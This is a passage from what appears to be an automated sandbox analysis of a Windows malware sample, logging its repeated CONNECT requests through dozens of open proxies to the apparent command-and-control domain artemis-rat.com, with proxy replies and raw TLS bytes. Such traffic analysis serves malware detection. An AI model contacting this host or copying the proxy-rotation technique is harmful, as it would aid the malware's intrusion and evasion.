                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:29.156488895 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:31.663505077 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:34.163386106 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:39.202188969 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:49.256848097 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1431192.168.2.454348191.101.80.162807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.050426006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.845977068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.732151031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.645382881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.142345905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.655699968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.163424015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.163522005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.069544077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1432192.168.2.45431647.245.56.108181817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.050617933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846172094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1433192.168.2.453923189.240.60.16890907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.053378105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.326756954 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1434192.168.2.454320185.158.114.14259837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.053612947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1435192.168.2.45433145.76.150.19506857284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.054595947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1436192.168.2.454368130.162.213.17531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.056880951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.375153065 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1437192.168.2.45436652.67.10.183807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061060905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.382396936 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:24.472897053 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 b3 fc 16 32 19 d4 59 b0 6a fc a7 25 7f 6d 4b 25 dd 31 75 42 6f f7 95 05 bf 4f 51 83 58 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lhe2Yj%mK%1uBoOQX*,+0/$#('=<5/artemis-rat.com#5+lxLpx %W7xIW|.BI)ZI#4f"c:%)v
                                              Mar 11, 2024 08:37:24.794728994 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 23 4c c7 a3 bd ed bb 08 7f df 60 d9 90 ad 61 6d 05 b9 b7 a6 e4 fa a8 74 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                              Data Ascii: =9#L`amtDOWNGRD0000*H010Uartemis-rat.com0240311065443Z260311065443Z010Uartemis-rat.com0"0*H0s24
                                              Mar 11, 2024 08:37:25.067150116 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 ca 29 ff 24 0a 0f a3 73 7e 45 93 20 6d 6f 00 9b d5 a3 eb 2c 2f fa c3 38 7a 73 52 10 20 e9 f1 1b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ed c7 a2 5d 2b a6 aa 54 63 f7 95 60 da 3b 3e 1b e2 b9 88 4e c4
                                              Data Ascii: %! )$s~E mo,/8zsR (]+Tc`;>Nj <
                                              Mar 11, 2024 08:37:25.387092113 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 5b 4c e9 cf 11 1c 53 0b 4e 71 be ba c5 06 61 3e c0 52 4f 97 8b f4 45 8d 0c 30 b1 2f 5b 6d a1 3c 3f 77 fd 31 45 86 e0 d3
                                              Data Ascii: ([LSNqa>ROE0/[m<?w1E


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1438192.168.2.453231184.178.172.13153117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061227083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1439192.168.2.45433347.74.152.2988887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061234951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.397874117 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.20.1
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1440192.168.2.454415200.58.182.8941537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061567068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1441192.168.2.45449145.12.31.140807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061697960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.216209888 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1442192.168.2.45443351.15.230.100163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061785936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.757186890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.757344961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569755077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.163383961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.180404902 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1443192.168.2.45440680.67.8.6807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061846018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.385668993 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1444192.168.2.45439579.110.202.13180817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061939955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1445192.168.2.45470649.51.94.124437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.061959028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1446192.168.2.454525172.67.181.197807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.062001944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.216274977 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1447192.168.2.45394045.188.164.319947284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.062369108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.686113119 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1448192.168.2.454535172.67.250.212807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.062544107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.216815948 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1449192.168.2.454507103.152.112.167807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.062635899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.236552000 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.23.2
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1450192.168.2.454388128.199.221.9171767284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.062721968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
